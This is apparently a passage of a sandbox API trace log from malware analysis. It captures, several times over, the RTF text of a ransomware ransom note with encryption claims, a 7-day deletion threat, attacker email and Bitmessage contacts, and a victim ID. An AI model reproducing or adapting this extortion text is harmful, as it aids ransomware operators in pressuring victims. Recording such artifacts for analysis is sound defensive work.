\\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 